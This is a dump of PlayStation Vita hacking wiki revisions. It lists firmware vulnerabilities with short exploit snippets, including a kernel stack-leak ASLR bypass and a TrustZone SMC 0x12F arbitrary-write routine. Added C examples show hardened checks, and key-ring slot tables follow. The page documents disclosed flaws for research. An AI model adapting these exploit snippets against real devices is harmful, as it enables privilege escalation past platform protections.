sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, WINDOW_BASE+0x10, 0x3FF);<br />
store(RET, WINDOW_BASE+0x4);<br />
</source><br />
<br />
Fixed in 3.61.<br />
<br />
=== Syscall handler doesn't check syscall number ===<br />
<br />
(2015-07-03) A large syscall number passed in R12 can overflow syscall table and cause an arbitrary function pointer to be dereferenced and executed.<br />
<br />
This was patched in 1.61.<br />
<br />
=== Heap use-after-free in sceNetSyscallIoctl ===<br />
<br />
(2016-04-05) sceNetSyscallIoctl is declared as <code>int sceNetSyscallIoctl(int s, unsigned flags, void *umem)</code>. When <code>memsz = (flags_ >> 16) & 0x1FFF</code> is in the range (0x80; 0x1000], it uses the SceNetPs custom malloc to allocate a buffer of that size on the heap. However, the second argument to malloc is 0, meaning that when not enough memory is available it does not return NULL; instead it unlocks the global SceNetPs mutex and waits on a semaphore. While malloc is waiting, another thread can free the socket sceNetSyscallIoctl is operating on, causing a use-after-free condition.<br />
<br />
When passed proper arguments, sceNetSyscallIoctl will execute a function from the socket's vtable at the end:<br />
<br />
<pre><br />
v13 = (*(int (__fastcall **)(int, signed int, unsigned int, char *))(*(_DWORD *)(socket + 24) + 28))(<br />
socket,<br />
11,<br />
flags_,<br />
mem_);<br />
</pre><br />
<br />
Fixed in 3.63.<br />
<br />
=== 3 kernel exploits on DevKit by TheFloW ===<br />
<br />
2 still to be disclosed by TheFloW.<br />
<br />
Patched in 3.68.<br />
<br />
==== kernel stack leak in sceMotionDevGetEvaInfo ====<br />
<br />
This can be used to defeat kernel ASLR on DevKit on FW < 3.68.<br />
<br />
<source lang="C"><br />
uint32_t get_sysmem_base() {<br />
uint32_t info[0x12];<br />
<br />
// 1) Call a function that writes sp to kernel stack<br />
sceAppMgrLoadExec(NULL, NULL, NULL);<br />
<br />
// 2) Leak kernel stack<br />
sceMotionDevGetEvaInfo(info);<br />
<br />
// 3) Get sysmem base<br />
uint32_t sysmem_addr = info[0] & 0xFFFFF000;<br />
<br />
return sysmem_addr;<br />
}<br />
</source><br />
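<br />
The sceIoDevctl bug above (up to 0x3FF bytes of stale kernel stack returned to the caller) and this sceMotionDevGetEvaInfo leak (0x48 bytes) are instances of one defect: a kernel handler copies a stack buffer out to user memory without first clearing it and without bounding the copy to the bytes it actually produced. The C below is an added example, not Vita code. The kernel stack is modelled as a scratch area that a previous call has left filled with 0xAA, the copy to user space is stood in by memcpy, and the devinfo_t record, the sizes and the marker byte are constructed for the example.<br />
<br />
```c
#include <stdint.h>
#include <string.h>

#define STACK_MODEL_SIZE 0x40   /* size of the modelled stack frame */
#define STALE_BYTE 0xAA         /* what the previous syscall left on the stack */

/* A small status record the handler produces for the caller. */
typedef struct {
    uint32_t status;
    uint32_t count;
} devinfo_t;

/* Vulnerable pattern: the record is placed at the top of a larger, never
 * cleared stack frame, and the caller's requested length (up to the whole
 * frame) is copied back out.  Everything past the 8 bytes that were written
 * is whatever the stack held before this call. */
size_t handler_leaky(uint8_t *stack, uint8_t *user_out, size_t outlen) {
    devinfo_t info = { 1, 2 };
    memcpy(stack, &info, sizeof info);     /* only 8 bytes of the frame are written */
    if (outlen > STACK_MODEL_SIZE) outlen = STACK_MODEL_SIZE;
    memcpy(user_out, stack, outlen);       /* the rest of the copy is stale stack */
    return outlen;
}

/* Hardened pattern: clear the frame before use and never copy more than the
 * bytes the handler produced, whatever length the caller asked for. */
size_t handler_fixed(uint8_t *stack, uint8_t *user_out, size_t outlen) {
    memset(stack, 0, STACK_MODEL_SIZE);    /* a secure-clear primitive in real kernels */
    devinfo_t info = { 1, 2 };
    memcpy(stack, &info, sizeof info);
    size_t produced = sizeof info;
    if (outlen > produced) outlen = produced;  /* bound by what was written */
    memcpy(user_out, stack, outlen);
    return outlen;
}

/* Count bytes in the returned buffer that carry the stale marker, i.e. the
 * bytes of the previous kernel context that reached the caller. */
size_t count_leaked_bytes(const uint8_t *buf, size_t n) {
    size_t leaked = 0;
    for (size_t i = 0; i < n; i++)
        if (buf[i] == STALE_BYTE) leaked++;
    return leaked;
}

/* Run one handler against a frame pre-filled with stale data and return how
 * many stale bytes the caller received. */
size_t leak_test(int fixed) {
    uint8_t stack[STACK_MODEL_SIZE];
    uint8_t out[STACK_MODEL_SIZE];
    memset(stack, STALE_BYTE, sizeof stack);   /* residue of an earlier call */
    memset(out, 0, sizeof out);
    size_t n = fixed ? handler_fixed(stack, out, sizeof out)
                     : handler_leaky(stack, out, sizeof out);
    return count_leaked_bytes(out, n);
}
```
<br />
The length bound matters as much as the clear: with only the memset, a handler that later grows its record would still copy its own uninitialised padding, and with only the bound, a caller could still read whatever sat in the record's unwritten fields.<br />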
<br />
=== h-encore kernel exploit ===<br />
<br />
Discovered on 2018-02-03. Released on 2018-06-29.<br />
<br />
Should be exploitable at least on 3.00 and up to 3.68. Fixed in 3.69.<br />
<br />
Some functions in [[SceNgs]] take a kernel pointer (xor'ed with a known static value) from the user. [https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md Writeup] and [https://github.com/TheOfficialFloW/h-encore source code].<br />
<br />
== Non-secure Boot Loader (NSBL) ==<br />
<br />
=== Ensō ===<br />
<br />
(2017-04-30) A logic flaw related to error code propagation in NSBL allows for a buffer overflow in the data section and early code execution on ARM in non-secure privileged mode.<br />
<br />
It was patched in 3.67.<br />
<br />
[https://yifan.lu/2017/07/31/henkaku-enso-bootloader-hack-for-vita yifan's write-up]<br />
<br />
[https://github.com/henkaku/enso enso source code]<br />
<br />
== [[Secure_World|Secure World (TrustZone)]] ==<br />
<br />
=== SMC 0x12F does not validate arguments -> TrustZone level arbitrary code execution ===<br />
<br />
(2017-01-01) SMC 0x12F (sceSblSmSchedGetStatusMonitorCall) takes two unchecked arguments: <code>sm_handle</code> and <code>shared_mem_index</code>.<br />
<br />
<code>sm_handle</code> is a pointer to TrustZone memory in the form of <code>(tz_addr >> 0x01)</code> and <code>shared_mem_index</code> is an integer value calculated as <code>((shared_mem_blk_addr - shared_mem_base_addr) / 0x80)</code>.<br />
<br />
By passing the right value as <code>sm_handle</code>, SMC 0x12F will read 0x08 bytes from <code>(tz_addr + 0x28)</code> and return them at <code>(shared_mem_base_addr + index * 0x80)</code> which translates to a TrustZone arbitrary memory leak (0x08 bytes only).<br />
<br />
By passing the right value as <code>shared_mem_index</code> it is also possible to write the leaked data into an arbitrary TrustZone memory region.<br />
The Non-secure Kernel sees the shared memory region at <code>0x00400000</code> (size is 0x5000 bytes) and the Secure Kernel sees the exact same memory region at <code>0x00560000</code>, thus making it possible to plant data inside the Non-secure Kernel's region and having the SMC copy this data somewhere into TrustZone memory (e.g.: SMC table).<br />
<br />
This results in TrustZone level arbitrary code execution.<br />
<br />
It was patched somewhere between 1.80 and 2.10.<br />
<br />
A 1.80 TrustZone modules imports/exports list is available [https://pastebin.com/59pe8jBg here].<br />
<br />
Example code exploiting this vulnerability:<br />
<br />
<source lang="c"><br />
#include <stdint.h><br />
#include <string.h><br />
<br />
void tz_memcpy_8(uintptr_t dst, const void *src)<br />
{<br />
    /* stage the 8 bytes at +0x28 of the Non-secure view of the shared region */<br />
    memcpy((void *)0x00400028, src, 8);<br />
<br />
    /* sm_handle points at the Secure view of the same region; the index selects the 0x80-byte slot at dst */<br />
    uintptr_t sm_handle = 0x00560000 >> 1;<br />
    uintptr_t shared_mem_index = (dst - 0x00560000) / 0x80;<br />
<br />
    asm volatile(<br />
        "mov r0, %0\n\t"<br />
        "mov r1, %1\n\t"<br />
        "mov r12, #0x12F\n\t"<br />
        "smc #0\n\t"<br />
        : : "r"(sm_handle), "r"(shared_mem_index) : "r0", "r1", "r12", "memory"<br />
    );<br />
}<br />
</source><br />
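<br />
The syscall-table bug (an unchecked number in R12 walks off the end of the table) and SMC 0x12F (unchecked <code>sm_handle</code> and <code>shared_mem_index</code>) are both missing range checks on an index into privileged memory. The C below is an added example of the checks such a dispatcher and handler should perform; it is not Vita or TrustZone code. The shared-memory geometry (0x5000 bytes of 0x80-byte slots, Secure view at 0x00560000) is taken from the text above; the table length, the region in which legitimate handles may point, and the error codes are assumptions made for the example.<br />
<br />
```c
#include <stdint.h>
#include <stddef.h>

/* Geometry from the page: a 0x5000-byte shared region split into 0x80-byte
 * slots, seen by the Secure Kernel at 0x00560000. */
#define SHM_SECURE_BASE   0x00560000u
#define SHM_SIZE          0x5000u
#define SHM_SLOT          0x80u
#define SHM_SLOTS         (SHM_SIZE / SHM_SLOT)     /* 0xA0 slots */

/* Assumed for the example: the region in which legitimate sm_handle values
 * (secure addresses >> 1) may point, and the record the call reads from it. */
#define SM_OBJ_BASE       0x00500000u
#define SM_OBJ_SIZE       0x00010000u
#define SM_OBJ_READ_OFF   0x28u
#define SM_OBJ_READ_LEN   8u

enum { CALL_OK = 0, CALL_EINVAL = -22, CALL_ENOSYS = -38 };  /* assumed codes */

typedef int (*call_fn)(uint32_t a0, uint32_t a1);

/* Accept a handle only if the whole read it implies lies inside the object
 * region; the arithmetic is ordered so nothing can wrap. */
int validate_sm_handle(uint32_t sm_handle) {
    if (sm_handle > (UINT32_MAX >> 1)) return CALL_EINVAL;      /* << 1 would overflow */
    uint32_t addr = sm_handle << 1;
    if (addr < SM_OBJ_BASE || addr >= SM_OBJ_BASE + SM_OBJ_SIZE) return CALL_EINVAL;
    if ((SM_OBJ_BASE + SM_OBJ_SIZE) - addr < SM_OBJ_READ_OFF + SM_OBJ_READ_LEN)
        return CALL_EINVAL;                                      /* read would run past the region */
    return CALL_OK;
}

/* Accept an index only if the slot it selects lies inside the shared region. */
int validate_shm_index(uint32_t index) {
    return index < SHM_SLOTS ? CALL_OK : CALL_EINVAL;
}

/* Handler for a 0x12F-style call: both arguments are validated before any
 * memory is touched, so the index can only ever select a slot inside the
 * shared region, never an arbitrary secure address. */
int get_status_monitor(uint32_t sm_handle, uint32_t index) {
    int rc = validate_sm_handle(sm_handle);
    if (rc) return rc;
    rc = validate_shm_index(index);
    if (rc) return rc;
    /* real code would now copy 8 bytes to SHM_SECURE_BASE + index * SHM_SLOT */
    return CALL_OK;
}

static call_fn call_table[] = { get_status_monitor };
#define CALL_TABLE_LEN (sizeof call_table / sizeof call_table[0])

/* Dispatcher: the call number (R12 on ARM) is checked against the table
 * length, and the slot is checked for a handler, before it is used. */
int dispatch(uint32_t nr, uint32_t a0, uint32_t a1) {
    if (nr >= CALL_TABLE_LEN || call_table[nr] == NULL) return CALL_ENOSYS;
    return call_table[nr](a0, a1);
}
```
<br />
With the handle region restricted to the assumed object area, a handle that points into the shared region itself (as the code above passes) is rejected before the read happens, and an index of 0xA0 or more is rejected before the write; that pair of checks is what the patched firmware had to add.<br />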
<br />
== Hardware ==<br />
<br />
=== Crypto engine allows partial AES key overwrite ===<br />
<br />
(2017-02-01) The Dmac5 crypto engine, accessible from the kernel, allows writing 4 bytes of key material at a time. This makes it possible to recover plaintext AES keys via bruteforce.<ref>https://yifan.lu/2017/02/19/psvimgtools-decrypt-vita-backups/</ref><br />
<br />
== F00D Processor ==<br />
<br />
=== octopus exploit ===<br />
(2017-02-18) To be disclosed.<br />
<br />
https://twitter.com/pomfpomfpomf3/status/832806488221446145<br />
<br />
<pre><br />
octopus exploit<br />
<br />
.---. ,,<br />
,, / \ ;,,'<br />
;, ; ( o o ) ; ;<br />
;,';,,, \ \/ / ,; ;<br />
,,, ;,,,,;;,` '-,;'''',,,'<br />
;,, ;,, ,,,, ,; ,,,'';;,,;''';<br />
;,,,; ~~' '';,,''',,;'''' <br />
</pre><br />
<br />
(I copied the octopus from an ASCII art page: http://ascii.co.uk/art/octopus)<br />
<br />
=== To be disclosed ===<br />
<br />
(2017-02-23) To be disclosed.<br />
<br />
=== Petite Mort ===<br />
<br />
(2018-07-27) Because We Know Real French Words(TM)<br />
<br />
== References ==<br />
<references/><br />
<br />
[[Category:Vulnerabities]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Cmep_Key_Ring_Base&diff=9834Cmep Key Ring Base2018-08-09T19:58:59Z<p>Xyz: /* Key Ring Slots 0xE0058000 */</p>
<hr />
<div>Address = 0xE0058000 + 32 * Slot<br />
<br />
=== Permission bits ===<br />
{| class="wikitable"<br />
|-<br />
! Bit !! Function<br />
|-<br />
| 0x01 || accessible for bigmac encrypt<br />
|-<br />
| 0x02 || accessible for bigmac decrypt<br />
|-<br />
| 0x10 || ?<br />
|-<br />
| 0x20 || crypto operation supports a keyslot dst<br />
|-<br />
| 0x80 || related to bootrom functionality. If set then permissions for this slot can be reset<br />
|-<br />
| 0x400 || dst can be memory<br />
|-<br />
| 0x800 || can be written directly by f00d (?)<br />
|-<br />
| 0x1000 || can be read directly by f00d<br />
|}<br />
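<br />
The slot table below lists protection words such as 0x0502 and 0x061F that contain bits this permission table does not describe. The C below is an added example, not code from this page or from any Vita tool; it computes a slot's address from the formula at the top of the page, names the documented bits in a protection word, and returns the bits that remain undocumented, so the slot table can be read against the permission table mechanically. The slot values used in main() are copied from the slot table.<br />
<br />
```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <inttypes.h>

#define KEYRING_BASE      0xE0058000u
#define KEYRING_SLOT_SIZE 32u

/* Address of a key ring slot: 0xE0058000 + 32 * Slot. */
uint32_t keyring_slot_addr(uint32_t slot) {
    return KEYRING_BASE + KEYRING_SLOT_SIZE * slot;
}

/* Permission bits as documented in the table above. */
typedef struct { uint32_t bit; const char *meaning; } perm_bit_t;

static const perm_bit_t known_bits[] = {
    { 0x0001, "bigmac encrypt" },
    { 0x0002, "bigmac decrypt" },
    { 0x0010, "unknown (0x10)" },
    { 0x0020, "keyslot dst" },
    { 0x0080, "bootrom: permissions resettable" },
    { 0x0400, "dst can be memory" },
    { 0x0800, "f00d direct write (?)" },
    { 0x1000, "f00d direct read" },
};
#define KNOWN_BIT_COUNT (sizeof known_bits / sizeof known_bits[0])

/* Mask of every bit the permission table describes. */
uint32_t known_mask(void) {
    uint32_t m = 0;
    for (size_t i = 0; i < KNOWN_BIT_COUNT; i++) m |= known_bits[i].bit;
    return m;
}

/* Bits set in a protection word that the permission table does not cover. */
uint32_t undocumented_bits(uint32_t prot) {
    return prot & ~known_mask();
}

/* Print one slot: address, documented bits by name, then the leftovers. */
void describe_slot(uint32_t slot, uint32_t prot) {
    printf("slot 0x%" PRIX32 " @ 0x%08" PRIX32 " prot 0x%04" PRIX32 ":",
           slot, keyring_slot_addr(slot), prot);
    for (size_t i = 0; i < KNOWN_BIT_COUNT; i++)
        if (prot & known_bits[i].bit) printf(" [%s]", known_bits[i].meaning);
    uint32_t rest = undocumented_bits(prot);
    if (rest) printf(" undocumented=0x%" PRIX32, rest);
    printf("\n");
}

int main(void) {
    /* Entries taken from the slot table: 0x10, 0x21 and 0x501 */
    describe_slot(0x10, 0x0502);
    describe_slot(0x21, 0x061F);
    describe_slot(0x501, 0x1000);
    return 0;
}
```
<br />
Running it shows, for instance, that 0x0502 carries 0x100 and 0x061F carries 0x200, 0x08 and 0x04 beyond the documented bits, which is where the permission table still has gaps.<br />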
<br />
=== Key Ring Slots 0xE0058000 ===<br />
<br />
{| class="wikitable"<br />
|-<br />
! Slot !! Mode !! Protection !! Per-console !! Description<br />
|-<br />
| 0 || 3 || 0x0442 || ? || ?<br />
|-<br />
| 1 || 1 || 0x0442 || ? || ?<br />
|-<br />
| 2-7 || 1 || 0x0040 || ? || ?<br />
|-<br />
| 8 || 3 || 0x0081 || Yes. || enp per-console key<br />
|-<br />
| 9 || 1 || 0x0080 || ? || ?<br />
|-<br />
| 0xA-0xF || 3 || 0x0080 || ? || ?<br />
|-<br />
| 0x10 || 1 || 0x0502 || ? || supports decryption only<br />
|-<br />
| 0x11-0x1F || 1 || 0x0100 || ? || ?<br />
|-<br />
| 0x20 || 3 || 0x0200 || ? || Derived from 0x344, used for hmac-sha256 over enc files<br />
|-<br />
| 0x21-0x24 || 1 || 0x061F || ? || supports encryption and decryption<br />
|-<br />
| 0x25-0x2F || 1 || 0x0200 || ? || ?<br />
|-<br />
| 0x30-0x34 || 1 || 0x041F || ? || ?<br />
|-<br />
| 0x35-0x7F || 1 || 0x0000 || ? || ?<br />
|-<br />
| 0x80-0xFF || 0 || 0x0000 || ? || ?<br />
|-<br />
| 0x100 || 1 || 0x041F || ? || ?<br />
|-<br />
| 0x101-0x17F || 1 || 0x0000 || ? || ?<br />
|-<br />
| 0x180-0x1FF || 0 || 0x0000 || ? || ?<br />
|-<br />
| 0x200-0x203 || 3 || 0x0000 || ? || ?<br />
|-<br />
| 0x204-0x205 || 3 || 0x006F || ? || ?<br />
|-<br />
| 0x206 || 3 || 0x00A0 || ? || Used to derive key used to decrypt personalized layer over enc. Should be per-console.<br />
|-<br />
| 0x207 || 3 || 0x00A0 || ? || Used instead of the above key when secret debug mode is set. (Possibly non-per-console?)<br />
|-<br />
| 0x208-0x20D || 3 || 0x00A0 || ? || 6 keys used to decrypt enc metadata, which one is used depends on key revision in enc header<br />
|-<br />
| 0x20E-0x20F || 3 || 0x0010 || ? || Maybe per-console emmc crypto keys? Protected by second_loader.<br />
|-<br />
| 0x210-0x211 || 3 || 0x0000 || ? || ?<br />
|-<br />
| 0x212 || 3|| 0x001F || ? || ?<br />
|-<br />
| 0x213 || 3|| 0x001F || ? || Used to derive SMI keys, which are used for factory fw decryption. Per-console.<br />
|-<br />
| 0x214 || 3|| 0x0000 || ? || Used to derive keyslots 0x514, 0x515 in second_loader<br />
|-<br />
| 0x215 || 3|| 0x0000 || ? || ?<br />
|-<br />
| 0x216 || 3|| 0x001F || ? || Derive 0x502-0x504 by encrypting data in second_loader.<br />
|-<br />
| 0x217 || 3 || 0x0000 || ? || ?<br />
|-<br />
| 0x218-0x2FF || 0 || 0x0000 || ? || ?<br />
|-<br />
| 0x300-0x33F || 3 || 0x0000 || ? || ?<br />
|-<br />
| 0x340 || 3 || 0x012F || ? || Used to decrypt keys into the 0x10 key slot<br />
|-<br />
| 0x341-0x343 || 3 || 0x0120 || ? || ?<br />
|-<br />
| 0x344 || 3 || 0x0220 || ? || Used to derive key 0x20 in brom.<br />
|-<br />
| 0x345-0x348 || 3 || 0x022F || ? || Used to decrypt keys into one of the 0x21-0x24 key slot<br />
|-<br />
| 0x349-0x353 || 3 || 0x0220 || ? || ?<br />
|-<br />
| 0x354-0x3FF || 3 || 0x0000 || ? || ?<br />
|-<br />
| 0x400-0x47F || 1 || 0x0000 || ? || ?<br />
|-<br />
| 0x480-0x4FF || 0 || 0x0000 || ? || ?<br />
|-<br />
| 0x500 || 1 || 0x1800 || ? || ?<br />
|-<br />
| 0x501 || 7 || 0x1000 || No || Used by bootrom first_loader to figure out whether to load from eMMC or ARM comms after reset<br />
|-<br />
| 0x502-0x504 || 3 || 0x1800 || Yes || Related to Ernie SNVS<br />
|-<br />
| 0x505 || 1 || 0x0000 || ? || ?<br />
|-<br />
| 0x506 || 3 || 0x1800 || ? || ?<br />
|-<br />
| 0x507 || 3 || 0x1800 || No || ?<br />
|-<br />
| 0x508 || 3 || 0x1800 || No || Ernie HW version (from syscon cmd 0x1). Set to 0x100060D on 1.692, 0x100010A on 1.05, 0x0100010B on 1.50<br />
|-<br />
| 0x509 || 3 || 0x1800 || Yes || IDPS of unit (console id)<br />
|-<br />
| 0x50A || 3 || 0x1800 || ? || Byte15bit0,byte14bit0,byte14bit1,byte11bit4: Revocation related. Byte13bit0: Enable F00D debug prints.<br />
|-<br />
| 0x50B || 3 || 0x1800 || ? || From 0xD2 SNVS block 0, 8 bytes<br />
|-<br />
| 0x50C || 3 || 0x1800 || No || Flags. Set to 1 on 1.692 and newer, 0 on older<br />
|-<br />
| 0x50D || 3 || 0x1800 || Yes || OpenPSID<br />
|-<br />
| 0x50E || 3 || 0x1800 || Yes || Current firmware version. Comes from SNVS.<br />
|-<br />
| 0x50F || 3 || 0x1800 || Yes || Factory firmware version. Comes from idstorage.<br />
|-<br />
| 0x510 || 3 || 0x1800 || Yes || Some bit flags, comes from syscon cmd 0x90 offset 0xE0<br />
|-<br />
| 0x511 || 3 || 0x1800 || Yes || Unique per boot session id, Syscon shared 0xD0 session key<br />
|-<br />
| 0x512 || 7 || 0x1800 || Yes || Tick count? Used in Syscon encrypted communication. Set to a random value when session key is set.<br />
|-<br />
| 0x513 || 3 || 0x1800 || No || DRAM size. Set to 0x20000000 on retail, 0x40000000 on devkit.<br />
|-<br />
| 0x514 || 3 || 0x1800 || No? || F00d-cmd F01 AES-256-CMAC key. Protected on 1.05.<br />
|-<br />
| 0x515 || 3 || 0x1800 || No? || F00d-cmd F01 AES-256-CBC key. Protected on 1.05.<br />
|-<br />
| 0x516 || 3 || 0x1800 || ? || F00d-cmd F01 writes (u32)1 here when exporting the infoblk. Next time main() executes this flag is cleared.<br />
|-<br />
| 0x517 || 3 || 0x1800 || || When initializing the EEPROM, this is zeroed if 0x50D has bit8 clear (on 1.692).<br />
|-<br />
| 0x518 || 3 || 0x1800 || No || Another current FW version (3.60+?) Comes from SNVS.<br />
|-<br />
| 0x519 || 3 || 0x1800 || No || 00s<br />
|-<br />
| 0x51A || 3 || 0x1800 || Yes || Randomized 0x20 byte key unique every boot/reboot/resume used for kernel coredump encryption<br />
|-<br />
| 0x51B || 3 || 0x1800 || No || Some kind of model info 0x406000 on retail and 0x416000 on devkit, obtained from syscon command 5<br />
|-<br />
| 0x51C-0x57F || 1 || 0x0000 || ? || ?<br />
|-<br />
| 0x580-0x5FF || 0 || 0x0000 || ? || ?<br />
|-<br />
| 0x600 || 3 || 0x1000 || Yes || <code>aimgr_sm.self</code> cmd 0x3 return, VisibleId/FuseId<br />
|-<br />
| 0x601 || 3 || 0x1000 || Yes || ?<br />
|-<br />
| 0x602 || 3 || 0x1000 || Yes || ?<br />
|-<br />
| 0x603 || 3 || 0x1000 || No || ?<br />
|-<br />
| 0x604 || 3 || 0x1000 || No || ?<br />
|-<br />
| 0x605-0x607 || 3 || 0x0000 || ? || ?<br />
|-<br />
| 0x608-0x6FF || 0 || 0x0000 || ? || ?<br />
|-<br />
| 0x700-0x77F || 3 || 0x0000 || ? || 16 public RSA keys for enc, which one is used depends on public key revision from enc header.<br />
|-<br />
| 0x780-0x7FF || 3 || 0x0000 || ? || ?<br />
|}</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Cmep_Key_Ring_Base&diff=9833Cmep Key Ring Base2018-08-03T19:27:58Z<p>Xyz: /* Key Ring Slots 0xE0058000 */</p>
<hr />
<div>Address = 0xE0058000 + 32 * Slot<br />
<br />
=== Permission bits ===<br />
{| class="wikitable"<br />
|-<br />
! Bit !! Function<br />
|-<br />
| 0x01 || accessible for bigmac encrypt<br />
|-<br />
| 0x02 || accessible for bigmac decrypt<br />
|-<br />
| 0x10 || ?<br />
|-<br />
| 0x20 || crypto operation supports a keyslot dst<br />
|-<br />
| 0x80 || related to bootrom functionality. If set then permissions for this slot can be reset<br />
|-<br />
| 0x400 || dst can be memory<br />
|-<br />
| 0x800 || can be written directly by f00d (?)<br />
|-<br />
| 0x1000 || can be read directly by f00d<br />
|}<br />
<br />
=== Key Ring Slots 0xE0058000 ===<br />
<br />
{| class="wikitable"<br />
|-<br />
! Slot !! Mode !! Protection !! Per-console !! Description<br />
|-<br />
| 0 || 3 || 0x0442 || ? || ?<br />
|-<br />
| 1 || 1 || 0x0442 || ? || ?<br />
|-<br />
| 2-7 || 1 || 0x0040 || ? || ?<br />
|-<br />
| 8 || 3 || 0x0081 || Yes. || enp per-console key<br />
|-<br />
| 9 || 1 || 0x0080 || ? || ?<br />
|-<br />
| 0xA-0xF || 3 || 0x0080 || ? || ?<br />
|-<br />
| 0x10 || 1 || 0x0502 || ? || supports decryption only<br />
|-<br />
| 0x11-0x1F || 1 || 0x0100 || ? || ?<br />
|-<br />
| 0x20 || 3 || 0x0200 || ? || Derived from 0x344, used for hmac-sha256 over enc files<br />
|-<br />
| 0x21-0x24 || 1 || 0x061F || ? || supports encryption and decryption<br />
|-<br />
| 0x25-0x2F || 1 || 0x0200 || ? || ?<br />
|-<br />
| 0x30-0x34 || 1 || 0x041F || ? || ?<br />
|-<br />
| 0x35-0x7F || 1 || 0x0000 || ? || ?<br />
|-<br />
| 0x80-0xFF || 0 || 0x0000 || ? || ?<br />
|-<br />
| 0x100 || 1 || 0x041F || ? || ?<br />
|-<br />
| 0x101-0x17F || 1 || 0x0000 || ? || ?<br />
|-<br />
| 0x180-0x1FF || 0 || 0x0000 || ? || ?<br />
|-<br />
| 0x200-0x203 || 3 || 0x0000 || ? || ?<br />
|-<br />
| 0x204-0x205 || 3 || 0x006F || ? || ?<br />
|-<br />
| 0x206 || 3 || 0x00A0 || ? || Used to derive key used to decrypt personalized layer over enc. Should be per-console.<br />
|-<br />
| 0x207 || 3 || 0x00A0 || ? || Used instead of the above key when secret debug mode is set. (Possibly non-per-console?)<br />
|-<br />
| 0x208-0x20D || 3 || 0x00A0 || ? || 6 keys used to decrypt enc metadata, which one is used depends on key revision in enc header<br />
|-<br />
| 0x20E-0x20F || 3 || 0x0010 || ? || Maybe per-console emmc crypto keys? Protected by second_loader.<br />
|-<br />
| 0x210-0x211 || 3 || 0x0000 || ? || ?<br />
|-<br />
| 0x212 || 3 || 0x001F || ? || ?<br />
|-<br />
| 0x213 || 3 || 0x001F || ? || Used to derive SMI keys, which are used for factory fw decryption. Per-console.<br />
|-<br />
| 0x214 || 3 || 0x0000 || ? || Used to derive keyslots 0x514, 0x515 in second_loader<br />
|-<br />
| 0x215 || 3 || 0x0000 || ? || ?<br />
|-<br />
| 0x216 || 3 || 0x001F || ? || Derive 0x502-0x504 by encrypting data in second_loader.<br />
|-<br />
| 0x217 || 3 || 0x0000 || ? || ?<br />
|-<br />
| 0x218-0x2FF || 0 || 0x0000 || ? || ?<br />
|-<br />
| 0x300-0x33F || 3 || 0x0000 || ? || ?<br />
|-<br />
| 0x340 || 3 || 0x012F || ? || Used to decrypt keys into the 0x10 key slot<br />
|-<br />
| 0x341-0x343 || 3 || 0x0120 || ? || ?<br />
|-<br />
| 0x344 || 3 || 0x0220 || ? || Used to derive key 0x20 in brom.<br />
|-<br />
| 0x345-0x348 || 3 || 0x022F || ? || Used to decrypt keys into one of the 0x21-0x24 key slot<br />
|-<br />
| 0x349-0x353 || 3 || 0x0220 || ? || ?<br />
|-<br />
| 0x354-0x3FF || 3 || 0x0000 || ? || ?<br />
|-<br />
| 0x400-0x47F || 1 || 0x0000 || ? || ?<br />
|-<br />
| 0x480-0x4FF || 0 || 0x0000 || ? || ?<br />
|-<br />
| 0x500 || 1 || 0x1800 || ? || ?<br />
|-<br />
| 0x501 || 7 || 0x1000 || ? || Downgrade protection? Set to 4 on 1.692, 0 on 1.05.<br />
|-<br />
| 0x502-0x504 || 3 || 0x1800 || Yes || Related to Ernie SNVS<br />
|-<br />
| 0x505 || 1 || 0x0000 || ? || ?<br />
|-<br />
| 0x506 || 3 || 0x1800 || ? || ?<br />
|-<br />
| 0x507 || 3 || 0x1800 || No || ?<br />
|-<br />
| 0x508 || 3 || 0x1800 || No || Ernie HW version (from syscon cmd 0x1). Set to 0x100060D on 1.692, 0x100010A on 1.05, 0x0100010B on 1.50<br />
|-<br />
| 0x509 || 3 || 0x1800 || Yes || IDPS of unit (console id)<br />
|-<br />
| 0x50A || 3 || 0x1800 || ? || Byte 15 bit 0, byte 14 bit 0, byte 14 bit 1, byte 11 bit 4: revocation related. Byte 13 bit 0: enable F00D debug prints.<br />
|-<br />
| 0x50B || 3 || 0x1800 || ? || From 0xD2 SNVS block 0, 8 bytes<br />
|-<br />
| 0x50C || 3 || 0x1800 || No || Flags. Set to 1 on 1.692 and newer, 0 on older<br />
|-<br />
| 0x50D || 3 || 0x1800 || Yes || OpenPSID<br />
|-<br />
| 0x50E || 3 || 0x1800 || Yes || Current firmware version. Comes from SNVS.<br />
|-<br />
| 0x50F || 3 || 0x1800 || Yes || Factory firmware version. Comes from idstorage.<br />
|-<br />
| 0x510 || 3 || 0x1800 || Yes || Some bit flags, comes from syscon cmd 0x90 offset 0xE0<br />
|-<br />
| 0x511 || 3 || 0x1800 || Yes || Unique per boot session id, Syscon shared 0xD0 session key<br />
|-<br />
| 0x512 || 7 || 0x1800 || Yes || Tick count? Used in Syscon encrypted communication. Set to a random value when session key is set.<br />
|-<br />
| 0x513 || 3 || 0x1800 || No || DRAM size. Set to 0x20000000 on retail, 0x40000000 on devkit.<br />
|-<br />
| 0x514 || 3 || 0x1800 || No? || F00d-cmd F01 AES-256-CMAC key. Protected on 1.05.<br />
|-<br />
| 0x515 || 3 || 0x1800 || No? || F00d-cmd F01 AES-256-CBC key. Protected on 1.05.<br />
|-<br />
| 0x516 || 3 || 0x1800 || ? || F00d-cmd F01 writes (u32)1 here when exporting the infoblk. Next time main() executes this flag is cleared.<br />
|-<br />
| 0x517 || 3 || 0x1800 || || When initializing the EEPROM, this is zeroed if 0x50D has bit8 clear (on 1.692).<br />
|-<br />
| 0x518 || 3 || 0x1800 || No || Another current FW version (3.60+?) Comes from SNVS.<br />
|-<br />
| 0x519 || 3 || 0x1800 || No || 00s<br />
|-<br />
| 0x51A || 3 || 0x1800 || Yes || Randomized 0x20 byte key unique every boot/reboot/resume used for kernel coredump encryption<br />
|-<br />
| 0x51B || 3 || 0x1800 || No || Some kind of model info 0x406000 on retail and 0x416000 on devkit, obtained from syscon command 5<br />
|-<br />
| 0x51C-0x57F || 1 || 0x0000 || ? || ?<br />
|-<br />
| 0x580-0x5FF || 0 || 0x0000 || ? || ?<br />
|-<br />
| 0x600 || 3 || 0x1000 || Yes || <code>aimgr_sm.self</code> cmd 0x3 return, VisibleId/FuseId<br />
|-<br />
| 0x601 || 3 || 0x1000 || Yes || ?<br />
|-<br />
